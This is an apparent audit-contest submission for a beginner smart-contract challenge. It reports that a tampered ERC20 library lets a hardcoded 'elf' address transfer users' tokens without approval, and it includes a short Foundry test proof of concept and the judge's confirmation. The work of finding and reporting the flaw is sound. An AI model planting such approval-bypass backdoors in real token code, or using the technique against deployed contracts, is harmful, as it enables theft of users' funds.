First Flight #5: Santa's List
First Flight #5
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

South Pole Elves can steal all tokens

ryonen

Summary

The modified implementation of ERC20 used in the protocol allows the elves to steal user tokens at any time without requiring approval.

Vulnerability Details

For some reason, the elves have altered the ERC20 implementation, granting themselves excessive power within the protocol.

Impact

Users can be deprived of their gifts.

POC

function testSuspiciousAddress() external {
address Elves = 0x815F577F1c1bcE213c012f166744937C889DAF17;
vm.startPrank(address(santasList));
santaToken.mint(user);
santaToken.mint(user);
santaToken.mint(user);
santaToken.mint(user);
santaToken.mint(user);
santaToken.mint(user);
vm.stopPrank();
assertEq(santaToken.balanceOf(user), 6e18);
uint256 allowance = santaToken.allowance(user, Elves);
assertEq(allowance, 0);
vm.startPrank(Elves);
santaToken.transferFrom(user, Elves, 6e18);
vm.stopPrank();
assertEq(santaToken.balanceOf(user), 0);
}

Tools Used

Foundry

Recommendations

Deal with the vulnerabilities introduced by the elves by reverting the ERC20 implementation to its standard form. Consider disciplinary actions for the elves involved.

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

unauthorized elf wallet approval in solmate-bad

Some sneaky elf has changed this library to a corrupted one where his wallet address skips all the approval checks for SantaToken! Shenanigans here - https://github.com/PatrickAlphaC/solmate-bad/blob/c3877e5571461c61293503f45fc00959fff4ebba/src/tokens/ERC20.sol#L88

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.